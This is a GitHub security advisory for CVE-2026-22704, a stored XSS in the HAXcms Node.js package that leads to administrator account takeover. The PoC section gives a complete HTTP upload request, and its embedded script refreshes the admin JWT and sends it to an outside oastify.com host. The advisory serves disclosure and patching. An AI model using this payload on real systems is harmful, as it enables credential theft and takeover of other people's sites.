
HAXcms Has Stored XSS Vulnerability that May Lead to Account Takeover

High severity GitHub Reviewed Published Jan 9, 2026 in haxtheweb/issues • Updated Jan 13, 2026

Package

npm @haxtheweb/haxcms-nodejs (npm)

Affected versions

>= 11.0.6, < 25.0.0

Patched versions

25.0.0

Description

Summary

Stored XSS Leading to Account Takeover

Details

The exploit chain:
1. Upload: An authenticated attacker uploads an .html file containing a JavaScript payload (the PoC below uses /system/api/saveFile with bulk-import=true, supplying a valid site_token and jwt). The multipart part is declared as text/plain, which does not stop the stored file from later being served as HTML.
2. Execution: A logged-in administrator is tricked into visiting the URL of the uploaded file. Because the file is served from the application's own origin, the payload runs with the application's origin.
3. Token refresh: The payload makes a fetch request to the /system/api/refreshAccessToken endpoint. Because the request is same-origin and the administrator is logged in, the browser attaches the haxcms_refresh_token cookie automatically; the script never has to read the cookie, so an HttpOnly flag would not block this step.
4. JWT theft: The server validates the refresh token and responds with a new, valid JWT access token in the JSON response body.
5. Exfiltration: The payload reads the new JWT from the response and sends it to an attacker-controlled server.
6. Account takeover: The attacker now possesses a valid administrator JWT and can take full control of the application.

Reproduction:

[screenshot]

Then we test access to this HTML file:

[screenshot]

Other users' identity information can then be obtained:

[screenshot]

PoC

POST /system/api/saveFile?siteName=yu&site_token=neWmRyvNbCCwiQ7MP2ojAjVMk-HtjlKYNOqsQjLt3RQ&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IlVqUzd6NFRFano1Q2xUMERiNnU0RmFROWJZSXgyMjd5OHN2NzRWb1hLbFkiLCJpYXQiOjE3NTUyNDYxODYsImV4cCI6MTc1NTI0NzA4NiwidXNlciI6ImFkbWluIn0.XrXr427aKbyw97aDjD2OX128DznGtw_CHMALAeodb0M HTTP/1.1
Host: 192.168.1.72:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Connection: close
Content-Length: 1128

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bulk-import"

true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file-upload"; filename="files/pwn1116.html"
Content-Type: text/plain

<script>
// This version adds headers to make the request look more legitimate.
fetch('/system/api/refreshAccessToken', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: '{}' // Sending an empty JSON object body
})
.then(response => {
  if (!response.ok) {
    throw new Error('Network response was not ok ' + response.statusText);
  }
  return response.json();
})
.then(data => {
  var stolenJWT = data.jwt;
  var attackerUrl = 'https://zqtqii0n7ptm168btd4htrntrkxbl29r.oastify.com/log?jwt=' + stolenJWT;
  fetch(attackerUrl);
})
.catch(error => {
  var attackerUrl = 'https://zqtqii0n7ptm168btd4htrntrkxbl29r.oastify.com/log?error=' + error.message;
  fetch(attackerUrl);
});
</script>

Processing your request...

------WebKitFormBoundary7MA4YWxkTrZu0gW--

Impact

The attacker now possesses a valid administrator JWT and can take full control of the application.

References

@btopro btopro published to haxtheweb/issues Jan 9, 2026
Published by the National Vulnerability Database Jan 10, 2026
Published to the GitHub Advisory Database Jan 13, 2026
Reviewed Jan 13, 2026
Last updated Jan 13, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
8.0 / 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
Low
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(2nd percentile)

Weaknesses

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

CVE ID

CVE-2026-22704

GHSA ID

GHSA-3fm2-xfq7-7778
